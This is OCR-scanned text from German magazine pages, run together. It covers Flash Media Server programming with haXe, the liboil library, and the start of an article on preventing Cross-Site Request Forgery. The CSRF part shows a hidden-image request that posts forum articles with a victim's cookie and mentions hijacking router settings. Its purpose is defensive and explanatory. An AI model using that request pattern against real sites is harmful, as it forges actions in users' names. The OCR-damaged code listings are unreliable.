ein proprietäres Client-Server-Protokoll 
zum Einsatz, das aber Open-Source- 
Anwendungen aus dem Flash-Umfeld 
ebenfalls verstehen [b]. 


Flash Media 


Server und Alternativen 


Im Gegensatz zum frei verfügbaren 
Flash Player handelt es sich bei den 
Flash-kompatiblen Servern überwiegend 
um kommerzielle Produkte. Adobe bie- 
tet den Flash Media Server 3 (FMS 3) 
für Windows und Linux seit Anfang 
2008 als Nachfolger des FMS 2 bezie- 
hungsweise des Flash Communication 


Eine einfache 
Server-Anwendung 
in Actionscript: 
Sobald der Server 
eine Client-Verbin- 
dung akzeptiert, 
führt er die nächsten 


Anweisungen aus. elient.echo = 


I Sendet durch Aufruf der Client-Methode "set$erverTine' 
I die aktuelle $erver-Zeit an den Client 

trace("Sending current server tine to client"); 
elient.call("set$erverTine", null, new Date()); 


Listing 1: main.asc 


application.onConnect = function(elient) { 
II Eingehende Verbindung imner akzeptieren 
this.acceptConnection(client); 
II Debug-Ausgabe ins Server-Logfile und auf die Webkonsole 
trace("Client connection accepted from IP " + client.ip + 

"at" + new Date()); 

I! Die Methode "echo! erwartet einen String als Parameter und ruft 
I! damit die Methode "say! des Clients auf 

funetiontstr) { 

trace("Client said !" + str + """); 

this.call("say", null, "Server echoes: " + str); 


Installation des FMS unter Linux 


Handelt es sich bei der Zielplattform nicht 
um eine von Adobe offiziell unterstützte 
Linux-Distribution, lässt sich oft dennoch 
eine lauffähige Installation des FMS2 
oder FMS3 einrichten. Hierzu deaktiviert 
man zunächst im Installations-Script in- 
stallFMS durch Auskommentieren der 
exit- Anweisungen in den Zeilen 36, 45, 60 
und 75 die plattformspezifischen Sicher- 
heitsabfragen und führt anschließend die 
reguläre Installation durch. Nun überprüft 
im Unterverzeichnis fms des Installations- 
pfads der Aufruf von 


Idd fmsadmin fmscore 


ob alle benötigten Shared Libraries in den 
erforderlichen Versionen vorhanden sind. 
Dies ist nicht immer der Fall, da die Ver- 
sionsnummern der relevanten Bibliothe- 
ken von denen bei Red Hat abweichen 


Server in zwei Versionen an, von denen 
lediglich die teurere Variante, der Flash 
Media Interactive Server, eigene server- 
seitige Anwendungen ausführen kann 
[e]. Offiziell unterstützte Plattformen für 
den FMS sind Windows Server 2003 
und Red Hat Linux 4. Die Installation 
verläuft jedoch auch auf Windows XP 
Professional erfolgreich, und durch klei- 
ne Manipulationen bei der Installation 
lassen sich außer Red Hat auch andere 


Compiler kennen. 


schlagen. 


IA-TRACT 


© Die Kommunikation von in Actionscript programmierten Client/Server-Anwendungen 
erfolgt über ein proprietäres Middleware-Protokoll, das auch einige Open-Source- 


@ Mit einigen Einschränkungen unterstützen die freien Compiler MTASC und haXe 
die Entwicklung von Flash-Player-Anwendungen auch ohne die Flash IDE. 


© Das Fehlen einer freien Flash-ähnlichen IDE erschwert zwar die Entwicklung von 
Anwendungen mit grafischen Elementen auf der Basis freier Werkzeuge, dafür 
lässt sich andererseits mit haXe eine Brücke zwischen Actionscript und Javascript 
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können. Abhilfe schafft das Anlegen sym- 
bolischer Links für die fehlenden Dateien, 
möglichst in einem separaten Verzeichnis. 


Auf 64-Bit-Systemen muss der Kernel An- 
wendungen im 32-Bit-Kompatibilitätsmo- 
dus ausführen können und die Links für 
fehlende Bibliotheken müssen sich auf die 
32-Bit-Bibliotheken beziehen. Das Hinzu- 
fügen des Verzeichnisses mit den Links 
sowie des Verzeichnisses fms zur Um- 
gebungsvariablen LD_LIBRARY_PATH 
informiert den Laufzeit-Linker über das 
Vorhandensein der neuen Libraries. An- 
schließend lassen sich der Flash Media Ser- 
ver sowie der Administrationsserver mit 


./fmsmgr server fms start 
./fmsmgr adminserver start 


auch auf einer Linux-Distribution wie Su- 
se 9.3 und neuer oder Gentoo starten. 


Linux-Distributionen einsetzen (siehe 
Kasten zur Installation). 

Zu Adobes Server existieren alter- 
native Produkte wie der Wowza Media 
Server [d], der auch für Debian Linux, 
Mac OS X und Solaris erhältlich ist. 
Im nichtkommerziellen Umfeld tum- 
melt sich der plattformunabhängige 
Server Red5, der sich allerdings noch 
im Beta-Stadium befindet [e]. Adobes 
FMS3 und der Wowza-Server sind je- 
weils als kostenlose Evaluierungs-Aus- 
führung für maximal zehn gleichzei- 
tige Client-Verbindungen verfügbar. 
Mit diesen Versionen lässt sich der 
komplette Funktionsumfang für Ent- 
wicklungszwecke nutzen. 

Anders als bei Adobes FMS ist die 
Programmiersprache des Wowza-Ser- 
vers und von Red5 nicht Actionscript, 
sondern Java. Eine einfache Übernahme 
bereits vorhandener serverseitiger Ac- 
tionscript-Anwendungen für den FMS 
ist bei einem Wechsel des Server-An- 
bieters daher nicht machbar. Der Ein- 
satz von Java statt Actionscript auf der 
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Webprogrammierung 


Server-Seite kann aber auch von Vorteil 
sein, bietet sich doch die Möglichkeit 
zur Wiederverwendung von bereits vor- 
handenem Java-Code und zur Nutzung 
der umfangreichen Java-APls. 


Konzepte müssen 
verstanden sein 


Bei Server-Side Actionscript (SSAS) 
für die Programmierung des FMS han- 
delt es sich um eine recht alte Ausprä- 
gung von Actionscript, die aus Java- 
script 1.5 hervorgegangen ist. Neben 
Adobes Website ist insbesondere Brian 
Lessers Buch [1] als Informationsquelle 
zur Programmierung in SSAS zu emp- 
fehlen. Zur Einrichtung einer serversei- 
tigen Anwendung für den FMS genügt 
es, auf dem Server im Verzeichnis ap- 
plications ein neues Unterverzeichnis 
mit dem Namen der Anwendung anzu- 
legen. Darin wird eine Textdatei na- 


Listing 2: Main.hx 


import flash.net.NetConnection; 
import flash.net.ObjectEncoding; 
import flash.events.NetStatusEvent; 
import flash.display.Sprite; 
import flash.text.TextField; 
import flash.text.TextFormat; 
class Main { 
static public var root:Sprite; 
public var conn:NetConnection; 
static var output:TextField; 
static function main() { 
root = flash.Lib. current; 
II Textfeld fuer Debug-Ausgabe erzeugen 
output = neu TextField(); 
output.defaultTextFormat = new TextFormat("verdana", 11); 
output.width = 350; 
output.height = 100; 
output.border = true; 
output.textColor = 0x000000; 
root.addthildloutput); 
i neu Nain(); 
II Zur Anzeige clientseitiger Debug-Informationen 
public function trace(str) { 
output.text += str + "\n'; 


} 
funetion netstat(stats:NetStatusEvent) { 
if(stats.info.code == "NetConnection.Connect.Success") { 
this.trace("Connection with server established"); 
} 


else if(stats.info.code == "NetConnection.Connect.Rejected") { 
this.trace("Connection with server rejected: " + 
stats. info.application.message); 


else if(stats.info.code == "NetConnection.Connect.Failed") { 
this.trace("Connection with server failed"); 
} 


funetion neu() { 
conn = new NetConnection(); 
conn.objectEncoding = ObjectEncoding.ANFO; 
conn.addEventListener(NetStatusEvent.NET_STATUS, netstat); 
conn.client = new CLient(conn, this); 
try 
conn.connect("rtmp://Localhost/echo"); 


catch(ex:Ddynamic) { 
tracelex); 


Die Startklasse der haXe-Client- 
Anwendung: Eine NefConnection- 
Instanz stellt die Verbindung zum 
Server her. 
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Die haXe-Client- Listing 3: Client.hx 
Klasse: Deren 
: import flash.net.NetConnection; 
Methode say wird class Client { 
. private var _conn:NetConnection; 
nach erfolgreichem private var _nain:Main; ' 
Verbindungsaufbau 
_conn = conn; 
vom Server ai, 
aufgerufen. } 


mens main.asc plat- 
ziert, die Anweisun- 
gen in SSAS enthält. 
Bei Bedarf lassen sich 
zusätzliche SSAS- 
Klassen in weiteren 


II veranlassen 


public function new(conn:NetConnection, main:Nain) { 


II Wird von Server aufgerufen, sobald die Verbindung akzeptiert wurde 
public function set$erverTime(timelessage:String) { 

say("Server time is " + timeMessage); 

I "echo! auf dem Server aufrufen 

_conn.call("echo", null, "Client is calling echo() on server"); 


1 "Wird vom Server aufgerufen, um den Client zu einer Ausgabe zu 


public function say(str:String) { 
_main.trace(str); 


Dateien hinterlegen. 
Sobald sich ein Client mit der Server- 
Anwendung verbindet, startet der Server 
main.asc und führt die darin befind- 
lichen Anweisungen aus. Die Kontrolle 
des Servers und einzelner Anwendungen 
erfolgt durch die als Webanwendung 
verfügbare Administrationskonsole, die 
Bestandteil der FMS-Distribution ist. 

Die API des Flash Media Servers ist 
nicht nur darauf ausgelegt, Audio- und 
Video-Daten effizient als Stream zu 
übertragen. Mit einem gegenüber ande- 
ren Middleware-Techniken vergleichs- 
weise geringen initialen Programmier- 
aufwand lassen sich Verbindungen zu 
Flash-Clients aufbauen und wechselsei- 
tig Methoden aufrufen. Auch wenn die 
FMS-API erste Schritte bei der Nut- 
zung der serverseitigen Flash-Technik 
gut unterstützt, darf dies nicht darüber 
hinwegtäuschen, dass die Entwicklung 
robuster Anwendungen auch hier ein 
tieferes Verständnis der zugrunde lie- 
genden Konzepte erfordert. 

Als Einstieg in die Programmierung 
des FMS zeigt Listing 1 eine einfache 
Anwendung in SSAS, aus der einige 
Grundregeln für die Client/Server- 
Kommunikation mit Flash und Action- 
script hervorgehen. Der Server arbeitet 
ereignisorientiert und führt beim Eintre- 
ten bestimmter Events die zugeordneten 
Methoden aus. So ruft er onConnect() 
auf, sobald ein Client versucht, eine 
Verbindung mit einer Serveranwendung 
aufzunehmen. Ob sie diese Verbindung 
zulässt, entscheidet der Server anhand 
der vom Client übermittelten Daten. 
Verbindungen zwischen dem Flash-Ser- 
ver und dem Browser-Plug-in sind per- 
sistent und werden automatisch ge- 
schlossen, sobald der Anwender die 
Webseite mit der laufenden Flash- 
Player-Anwendung verlässt. 

In Listing 1 bestätigt acceptConnec- 
tion() den Verbindungsaufbau ohne wei- 
tere Prüfung eventueller Parameter und 
trace schreibt eine Information ins Log- 


file. Für das Client-Objekt, dessen Re- 
ferenz die Server-Anwendung beim 
Verbindungsaufbau erhalten hat, las- 
sen sich nun serverseitige Methoden 
definieren, die der Flash Player an- 
schließend aufrufen kann. Als einfa- 
ches Beispiel dient die Definition der 
Methode echo(), die eine Zeichenkette 
als Argument erhält. echo() tut nichts 
weiter, als den Aufruf serverseitig mit 
einer frace-Anweisung zu protokollie- 
ren und anschließend die Methode 
say() des Clients mit der soeben erhal- 
tenen Zeichenkette als Parameter auf- 
zurufen. Am Ende der Initialisierung 
schickt der Server durch den Aufruf 
der Client-Methode setServerTime() 
die aktuelle Server-Zeit an den neu re- 
gistrierten Client und steht nun für die 
weitere Kommunikation bereit. 

Bis auf die Verfügbarkeit der trace- 
Anweisung, mit der sich zur Kontrolle 
des Programmflusses Debug-Informa- 
tion in der Webkonsole anzeigen bezie- 
hungsweise in Logdateien schreiben 
lässt, bietet der FMS leider keine De- 
bugging-Hilfen an, sodass sich das Tes- 
ten einer SSAS-Anwendung und die 
Fehlersuche umständlich gestalten. Ei- 
ne IDE zur besseren Unterstützung der 
Entwicklung in SSAS stellt Adobe 
nicht bereit. Insbesondere fehlt ein De- 
bugger auf Quelltext-Ebene, wie man 
ihn für die Client-Seite in der Flash- 
IDE findet. Die Entwicklung größerer 
serverseitiger Anwendungen ist daher 
zeitaufwendig und anfällig für Lauf- 
zeitfehler. Hier sollte Adobe in zukünf- 
tigen Versionen nachbessern, um sich 
dem von Java auf der Serverseite längst 
gewohnten Komfort anzunähern. 

Auch die Programmiersprache SSAS 
ist in die Jahre gekommen: Basierend 
auf einer alten Version von Action- 
script lässt ihr Funktionsumfang zu 
wünschen übrig. Es fehlen viele wichti- 
ge objektorientierte Merkmale, die auf 
der Client-Seite bereits seit Action- 
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Webprogrammierung 


In der Administrationskonsole 
erscheinen die Meldungen des Flash- 
Servers (Abb. 1). 


script 2 (im Folgenden kurz AS2) und 
insbesondere mit AS3 Einzug gehalten 
haben [2]. Dies hat zur Folge, dass man 
bei der Nutzung von Actionscript auf 
Server- und Client-Seite ständig ge- 
danklich zwischen zwei Welten um- 
schalten muss. 


haXe als Alternative 
zu Actionscript 3 


In einem gewissen Rahmen lassen sich 
auch ohne die kommerzielle Flash-IDE 
Anwendungen für den Flash Player rea- 
lisieren. Zwar gibt es für das komforta- 
ble Zusammenstellen und Bearbeiten 
von Grafiken und Animationen auf 
dem Bildschirm keine freien Alterna- 
tiven zu Adobes IDE, wohl aber für 
die Programmierung in Actionscript. 
So lässt sich AS2 mit dem plattformun- 
abhängigen Kommandozeilen-Compi- 
ler MTASC [f], der in die freie Action- 
script-Entwicklungsumgebung Flash 
Develop [g] integrierbar ist, in Flash- 
Bytecode übersetzen. Gegenüber dem 
AS2-Compiler bietet MTASC sogar 
den Vorteil einer strengeren Fehler- 
prüfung zur Übersetzungszeit, was die 
Gefahr von Laufzeitfehlern reduziert. 
MTASC wird allerdings im Hinblick 
auf neue Versionen von Actionscript 
nicht mehr weiterentwickelt. Diese 
Lücke schließt als Nachfolger der 
Compiler haXe [h]. Eine Integration 
in Flash Develop ist bei haXe zurzeit 
nur für die Version 2 möglich, nicht 
aber für die Betaversionen von Flash 
Develop 3. 


«Fl ADOBE’ FLASH" MEDIA ADMINISTRATION CONSOLE 


14, View Applications £ 4: 


haredd Objech 


echo/_definst_ - Live 


Anders als MTASC, bei dessen 
Entwicklung man auf Quelltext-Kom- 
patibilität zu Adobes AS2-Compiler 
Wert gelegt hat, ist haXe kein AS3- 
Compiler im eigentlichen Sinne. Die 
gleichnamige Programmiersprache ha- 
Xe ist zwar eng mit AS3 verwandt, 
verfolgt aber einen nicht ausschließ- 
lich auf die Kodierung in Actionscript 
zugeschnittenen Ansatz: haXe zielt auch 
auf die Entwicklung von Webanwen- 
dungen in Javascript ab. Per Compiler- 
Schalter lassen sich haXe-Quelltexte 
nach AS3 oder Javascript konvertieren, 
was haXe zu einem interessanten Com- 
piler-Frontend für diese Sprachen 
macht. Aber auch die direkte Erzeu- 
gung von Flash-Bytecode als SWF- 
Datei erlaubt der Compiler. Da er die 
Flash-Client-APIs vollständig unter- 
stützt, lassen sich alle Funktionen der 
Flash Player 8 und 9 ohne Einschrän- 
kungen abrufen. 

Die Listings 2 und 3 zeigen einen 
einfachen haXe-Client, der mit der vor- 
gestellten Server-Anwendung kommu- 
niziert. Die Verwandtschaft der haXe- 
eigenen Sprache mit AS3 oder Java ist 
offensichtlich, und die verwendeten 
Klassenbibliotheken stammen aus dem 
AS3-Fundus. Die Verbindung zum Ser- 
ver erfolgt über eine NetConnection- 
Instanz, die für den Verbindungsaufbau 
die URL der Server-Anwendung er- 
wartet. Die URL beginnt mit dem Pro- 
tokollnamen rzmp (Real Time Messa- 
ging Protocol) oder rimpt/rtmps, falls 
die Verbindung über HTTP/HTTPS 
getunnelt werden soll. Es folgen die Na- 
men des Server-Host, der hier dem lo- 


[a] Flash Player 

[b] Open Source Flash 

[c] Flash Media Server 

[d] Wowza Media Server 

[e] Red5 Open Source Flash Server 
[f] AS2-Compiler MTASC 

[g] Flash Develop ActionScript-Editor 
[h] Compiler haXe 

[i] Stand-alone-Flash-Player 
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www.adobe.com/products/player_census/flashplayer/ 
www.osflash.org 
www.adobe.com/products/flashmediaserver/ 
www.wowzamedia.com 

www.osflash.org/red5/ 

www.mtasc.org 

www.flashdevelop.org 

www.haxe.org 


www.adobe.com/support/flashplayer/downloads.html 


Listing 4: client.htmil 


<htnl» 

<head> 

<title>haXE-Client</title> 

</head> 

<body> 

<object type="application/x-shockwave-flash" data="client.suf" 

width="500" height="500" /> 
</body> 
</htnl> 


Zur Darstellung im Browser benötigt 
das Flash-Plug-in einen HTML-Wrapper 
für die SWF-Datei des Clients. 


kalen Host entspricht, und der Anwen- 
dung, die im gleichnamigen Verzeichnis 
unterhalb des Ordners applications auf 
dem Server liegt. Folgende Kommando- 
zeile kompiliert den Quellcode: 


haxe -swf-version 9 -main Main -swf client.swf 7 
Client.hx Main.hx 


Die Ergebnisdatei client.swf lässt sich 
mit dem Flash Player 9 direkt starten. 
Für Testzwecke ist es vorteilhaft, den 
Player in der Entwickler-Variante zu 
verwenden, die SWF-Dateien ohne Zu- 
tun eines Webbrowsers ausführt [i]. Bei 
Verwendung des Browser-Plug-ins 
wird neben der SWF-Datei ein HTML- 
Wrapper wie in Listing 4 benötigt. 

Nach dem Start der Anwendung 
meldet der Flash-Server im Logfile be- 
ziehungsweise der Administrationskon- 
sole, dass er eine neue Client-Verbin- 
dung eingerichtet und die aktuelle 
Server-Zeit an den Client gesendet hat 
(Abbildung 1). Gleichzeitig zeigt der 
Flash Player eine Meldung über den er- 
folgreichen Verbindungsaufbau und die 
Zeitinformation an, die er vom Server 
erhalten hat. Der Aufruf der Server- 
Methode echo() durch den Client sollte 
ebenfalls protokolliert worden sein. 
Meldet das Flash-Plug-in stattdessen 
einen Security-Error, sind die Sicher- 
heitseinstellungen des Player zu restrik- 
tiv und erfordern eine Anpassung. Sie 
lassen sich im Kontext-Menü (rechte 
Maustaste) einstellen und sind so zu 
wählen, dass der Zugriff des Player auf 
die Datei client.swf im lokalen Datei- 
system-Pfad zugelassen ist. 

Aus den in Listing 2 benutzten Klas- 
senbibliotheken geht hervor, dass sich 
die von Flash/Actionscript bekannten 
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Klassen und grafischen Komponenten 
auch mit haXe programmatisch erzeu- 
gen und ansprechen lassen. Dazu unter- 
stützt haXe zwei Flash-Bibliotheken, 
von denen die eine kompatibel zu 
Flash 8 (AS2, Flash Player 8 und 9) 
und die andere kompatibel zu Flash 
CS3 (AS3, Flash Player 9) ist. 

Das rein programmatische Zusam- 
menstellen von Komponenten für eine 
grafikzentrierte Flash-Anwendung be- 
reitete allerdings wenig Freude. Selbst 
weitere freie Werkzeuge wie swfmill, 
die auf den Open-Source-Flash-Web- 
seiten gelistet werden [b], und mit de- 
nen sich SWF-Dateien mit grafischen 
Komponenten zusammenstellen und 
manipulieren lassen, stellen keine we- 
sentliche Erleichterung dar. Hier ist 
die Flash-IDE den quelloffenen An- 
wendungen, die sich in erster Linie mit 
Aspekten der Programmierung und 
kaum des Oberflächen-Designs beschäf- 
tigen, eindeutig überlegen. Es bietet 
sich aber immerhin eine Arbeitstei- 
lung an, bei der das grafische Design 
innerhalb der IDE und die Erstellung 
der Anwendungslogik anschließend 
ganz oder teilweise mit haXe erfolgt, 


sei es nativ oder mit anschließender 
Konvertierung der Quelltexte nach 
Actionscript 3. 


Fazit 


Mit Flash lassen sich zusammen mit 
geeigneten Servern auch Webanwen- 
dungen aus dem Client/Server-Bereich 
entwickeln. Neben den bekannten kom- 
merziellen Tools gibt es dazu eine 
Reihe freier Werkzeuge aus dem Flash/ 
Actionscript-Umfeld, wobei diese aller- 
dings nicht optimal aufeinander abge- 
stimmt sind. 

Zur Erzeugung grafikintensiver An- 
wendungen eignet sich freie Software 
kaum, da eine der Flash-IDE ver- 
gleichbare freie Entwicklungsumge- 
bung nicht vorhanden ist. Im Bereich 
der Anwendungslogik hingegen lassen 
sich kostenlose Werkzeuge für die 
Client-Seite durchaus produktiv ein- 
setzen, wie die Compiler MTASC und 
haXe zeigen. Voraussetzung ist, dass 
der Entwickler die vielbeschworene 
Trennung von Programmlogik und gra- 
fischer Oberfläche konsequent beachtet. 


haXe-basierte Anwendungen eignen 
sich auch für die Realisierung clientsei- 
tiger Unit-Tests, insbesondere zur Über- 
prüfung der Logik einer Server-Anwen- 
dung. Wer sowohl Applikationen für 
Javascript als auch für Actionscript ent- 
wickelt, profitiert zudem von der Mög- 
lichkeit, haXe-kompatible Quelltexte 
nicht nur direkt in SWF-Dateien über- 
setzen, sondern die Quellen auch nach 
Actionscript oder Javascript konvertie- 
ren zu können. (ka) 
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Tools und Tipps 


Prozessorunabhängig optimierte Funktionen 


Rechnen 


wie geölt 


Michael Riepe 


\ 
A, 


Kommt es auf maximale Rechenleistung an, muss der 
Programmierer die besonderen Eigenschaften des Prozessors 
ausnutzen. Leider sind die so entstandenen Programme nicht 
mehr portabel. Die Bibliothek liboil kann Abhilfe schaffen. 


icht alle Rechner sind gleich. Ein 
N Lied davon können die Nutzer 

von Supercomputern singen: Ei- 
nen guten Teil ihrer Zeit verbringen sie 
damit, ihre Software für den vorhande- 
nen Rechner zu optimieren. Wechseln 
sie irgendwann auf ein anderes Modell, 
geht die Arbeit von vorn los. 

Ähnlich geht es den Entwicklern 
von Multimedia-Anwendungen oder 
Audio- und Video-Codecs. Program- 
miert man allein in der Hochsprache, 
läuft die Software zu langsam. Nutzt 
man die Besonderheiten der Prozessor- 
architektur — etwa MMX/SSE-Befehle 
bei AMD- und Intel-CPUs oder die Al- 
tivec-Einheit beim PowerPC -, ist sie 
hingegen nicht länger portabel. 

Sowohl bei wissenschaftlichen als 
auch bei Multimedia-Anwendungen 
verbringt die CPU viel Zeit in Pro- 
grammschleifen. Daher lohnt es sich, die 
in die Schleife eingebetteten Anweisun- 
gen zu untersuchen und gegebenenfalls 
zu optimieren — oder durch vorgefertig- 
te, optimierte Routinen zu ersetzen. 

Eine Sammlung solcher Routinen 
bietet die Library of Optimized Inner 
Loops liboil (siehe Kasten „Onlinequel- 


liboil 
liboil.freedesktop.org/wiki/ 


liboil Manual 
liboil.freedesktop.org/documentation/ 


Dirac und Schrödinger 
www.diracvideo.org 


gstreamer 
gstreamer.freedesktop.org 
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len“) von David Schleef, dem Entwick- 
ler des Dirac-Video-Codecs Schrödin- 
ger. Sie kommt sowohl dort als auch im 
Multimedia-Framework gstreamer zum 
Einsatz und bietet aktuell gut 400 Funk- 
tionen für das Rechnen mit Vektoren 
und Matrizen. 

Für jede Funktion gibt es eine Refe- 
renzimplementierung, die den Maßstab 
für Geschwindigkeit und Genauigkeit 
setzt. Daneben kann es mehrere opti- 
mierte Varianten geben. Beim ersten 
Aufruf wählt liboil automatisch die 
schnellste. Versionen, die falsch rech- 
nen oder unbekannte Befehle verwen- 
den, schließt die Bibliothek jedoch aus. 

Vor dem ersten Funktionsaufruf 
muss das Programm mit oil_init(); die 
Bibliothek initialisieren. Die Namen der 
übrigen Funktionen folgen dem Schema 
oil_<funktion>_<argumenttypen>: oil_ 
conv_f64_s32 etwa rechnet 32-Bit-Inte- 
ger vom Typ int32_t in 64-Bit-Gleit- 


Listing 1: oil_conv_f64_s32 


void oil_conv_f64_s32( 
/* Zielvektor und Schrittweite #/ 
double *dest, 
int dstr, 
/* Quellvektor und Schrittweite */ 
const int32_t xsrc, 
int sstr, 
/* Zahl der zu berechnenden Elenente #/ 
int n) 


while (n> 0) € 
dest = round((double)isre); 
dest += dstr; 
sre +2 sstr; 
1; 
} 
} 


Durch die variablen Schrittweiten 
lassen sich Funktionen wie 
oil_conv_f64_532 universell einsetzen. 


kommazahlen (double) um. Die ent- 
gegengesetzte Operation heißt oil_ 
clipconv_s32_f64. Sie rundet gebroche- 
ne Zahlen zur nächstliegenden ganzen 
Zahl; ob 0.5 auf- oder abgerundet wird, 
hängt von der jeweiligen Implementie- 
rung ab. Der Zusatz clip im Funktions- 
namen deutet an, dass sich bei der Kon- 
version nicht alle Werte auf den neuen 
Typ abbilden lassen und die Funktion 
daher gegebenenfalls den Wertebereich 
begrenzen (clippen) muss. 


Single Instruction, 
Multiple Data 


Als Argumente erwarten die Funktio- 
nen in der Regel Vektoren - in C also 
Zeiger auf das erste Element des Vek- 
tors. Mitunter muss man für jeden Vek- 
tor eine Schrittweite („stride‘) angeben, 
außerdem die Zahl der zu berechnenden 
Elemente. oil_conv_f64_s32 etwa benö- 
tigt fünf Argumente (siehe Listing 1). 

Mit oil_permute_<typ> lassen sich 
die Elemente eines Vektors neu anord- 
nen. Spezialfälle wie das bei der 
MPEG-Video-Kompression vorkom- 
mende Transponieren 8 x 8 Elemente 
großer Makroblöcke oder die „Zick- 
zack“-Konvertierung erledigen oil_trans 
8x8_<typ>, oil_zigzag8x8_<typ> und 
oil_unzigzag8x8_<typ>. 

Daneben beherrscht liboil die gängi- 
gen (Vektor-)Operationen mit jeweils 
mehreren Datentypen. Zusätzlich zu den 
elementweise durchgeführten Grund- 
operationen lassen sich das Skalarpro- 
dukt, die Summe der Elemente und der 
Betrag eines Vektors berechnen, Kon- 
stanten zu den Elementen addieren oder 
Vektoren mit Skalaren multiplizieren. 

Außerdem gibt es eine Reihe von 
Operationen für MPEG-Makroblöcke 
wie Matrix-Multiplikation, die Berech- 
nung des Unterschieds zweier Blöcke 
oder die Diskrete Cosinus-Transforma- 
tion (DCT, IDCT). Daneben existieren 
optimierte Funktionen für die Pixel- 
Manipulation und das Konvertieren 
zwischen verschiedenen Farbdarstel- 
lungen wie ARGB und AYUV. 

Definitionsgemäß ist liboil ein Pro- 
jekt, das niemals fertig wird. Kommen 
neue Prozessoren auf den Markt, erge- 
ben sich neue Gelegenheiten, den Code 
zu optimieren. Außerdem lassen sich je- 
derzeit neue nützliche Funktionen hin- 
zufügen. Hier sind vor allem die An- 
wendungsentwickler aufgerufen, ihren 
Teil beizusteuern. (mr) 
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Websicherheit 


er beim Besuch eines On- 
lineshops ein Produkt im ei- 
genen Warenkorb entdeckt, 


ohne es jemals auch nur angesehen zu 
haben, ist möglicherweise Opfer einer 
Attacke, die Cookies ausnutzt. In die- 
sem Fall bietet der Shop dem Nutzer 
ein langfristig gültiges Cookie, damit 
er sich für Warenkorb-Aktionen nicht 
extra anmelden muss. Erst beim Kauf- 
vorgang verlangt die Website das 
Passwort. Das ist zwar grundsätzlich 
eine gute Idee, birgt jedoch Risiken 
bei unzureichendem Schutz seitens 
des Servers, da Browser das Cookie 
bei Warenkorb-Aktionen automatisch 
mitsenden und im Formular nur benut- 
zerunabhängige Felder liefern müssen. 

Einen Angriff, der das ausnutzt, 
nennt man Cross-Site Request Forgery 
(CSRF, „Onlinequellen“ [a]). Zunächst 
soll ein kleines Beispiel zeigen, was 
genau passiert. Darauf aufbauend fol- 
gen mögliche Lösungswege sowie 
Gründe, die gegen andere Lösungen 
sprechen. 

Als Mini-Beispiel fungieren hier 
statt des Warenkorbs ein Forum und 
die Funktion des Artikelschreibens. Es 
ist auf alle Anwendungen übertragbar, 
die sich nur auf Cookies verlassen. Der 
Nutzer ist mit einer eine Stunde gülti- 
gen Session-ID (SID) auf der Site A 
(www forum.example) angemeldet. Die- 
se SID steht in einem Cookie, das der 
Browser bei jedem Request an Site A 
im HTTP-Header mitsendet. 

Das Formular zum Artikelschreiben 
enthalte ein Textfeld, einen Knopf zum 
Abschicken und ein verstecktes Feld 
mit der Aktion, die das serverseitige 
Programm ausführen soll. Der Brow- 
ser schickt somit an die Seite www .fo 
rum.example/script: 


article=Lorem Ipsum 
submit_article=Abschicken 
action=post_article 


sowie die SID im Cookie. 


Angriffe von vielen Seiten 


Ein Angreifer hat mehrere Möglich- 
keiten, dieses Formular zu versenden, 
ohne dass der Nutzer das möchte. 
Webseite B (www fremd.example), 
auf die der Nutzer etwa durch eine 
Suchmaschine gelangt ist, kann ein 
img-Element das src-Attribut 


http: //www.forum.example/script? \ 
article=...;submit_article=Abschicken;\ 
action=post_article 
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Cross-Site Request Forgery verhindern 


Mein Cookie 
gehört mir 


Tina Müller 


Cookies gibt es überall im Web: Sie speichern Einstellungen 
oder authentifizieren Benutzer. Das ist bequem und vermeidet 
Session-IDs in der URL, birgt aber auch Gefahren. 


enthalten (s. Abb. 1). Statt eines Bil- 
des funktionieren auch Javascript- und 
CSS-Dateien, Iframes, Redirect und 
Meta-Refresh. Ohne Zutun des Nutzers 
und unbemerkt von ihm schickt der 
Browser in allen diesen Fällen das 
Formular ab. 

Prüft Webseite A, ob das Formular 
per POST eintrifft, verhindert dies den 
Angriff, da die genannten Links nur ei- 
nen GET-Request auslösen. Es gibt je- 
doch noch andere Möglichkeiten. Auf 
der Webseite B kann sich ein voraus- 
gefülltes, verstecktes Formular befin- 
den, das ein Submit-Button abschickt, 
ohne dass der Benutzer sich dessen be- 


wusst ist. Bei aktiviertem Javascript hat 
man leichtes Spiel, so kann die Seite 
ein Formular automatisch abschicken. 

In keinem der genannten Fälle ge- 
langt das Cookie an die fremde Site B, 
was den Angriff von klassischem XSS 
(Cross-Site Scripting) unterscheidet, je- 
doch sendet der Browser das Cookie 
vertrauensvoll an A. So kann man also 
mit einer manipulierten Webseite Fo- 
rums-Artikel unter dem Namen anderer 
veröffentlichen oder Produkte in ande- 
rer Leute Warenkörbe legen. 

Da es ein passiver Angriff ist, muss 
man warten, bis ein mögliches Opfer auf 
die manipulierte Webseite kommt. Bei 
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Websicherheit 


www.fremd.example.de 


harmlos aussehende Angreiferseite 


<img 
src="http://www.forum.example/script? 
article=...;" 

alt=" height="0" width="0"> 


versteckter Request 


www.forum.example.de 


Forum-Artikel schreiben 


Ein verstecktes Bild löst einen Request auf eine andere Domain aus, 


vielbesuchten, populären Webseiten 
kann es sich lohnen, Nutzer durch gute 
Suchmaschinenplatzierung auf die Sei- 
te zu locken. Bei einer kleineren Nut- 
zergemeinde hilft unter Umständen das 
gezielte Verschicken von Links auf die- 
se Seite. 


Leichtes Spiel 
mit dem Router 


CSRF ist weniger bekannt als XSS 
oder SQL-Injections und noch selten 
im Einsatz, gewinnt jedoch mittlerwei- 
le an Aufmerksamkeit. Beispiele sind 
Angriffe auf lokale Router. Viele von 
ihnen sind standardmäßig unter dersel- 
ben lokalen IP-Adresse zu erreichen 
(192.168.0.1), und mit CSRF kann man 
so die Router-Einstellungen ahnungs- 
loser Nutzer verändern, wenn diese ge- 
rade eingeloggt sind [b]. Verstärkt tritt 
dieser Angriff auf, wenn die Router- 
Software statt Cookies nur Basic-Au- 
thentication verwendet, da solche Ses- 
sions in der Regel bis zum Beenden 
des Browsers bestehen. Einige Browser 
bieten allerdings die Möglichkeit, sich 
durch manuelles Löschen der Anmel- 
dedaten „auszuloggen“. Auch bekannte 
Content-Management-Systeme haben 
es mit solchen Lücken schon in die 
News geschafft [c]. 


Keine einfache 
Lösung im Browser 


Weitgehenden Schutz böte eine Ein- 
stellung, mit der „eingebettete“ Anfra- 
gen von Domain B auf Domain A kei- 
ne Cookies liefern. In Opera gibt es 
schon lange die Option „Nur Cookies 
der besuchten Seite annehmen“, die in 
einem Test mit Opera 9.5 Beta das Ge- 
wünschte erledigte. Für Firefox exis- 
tiert die Extension Cookiesafe und die 
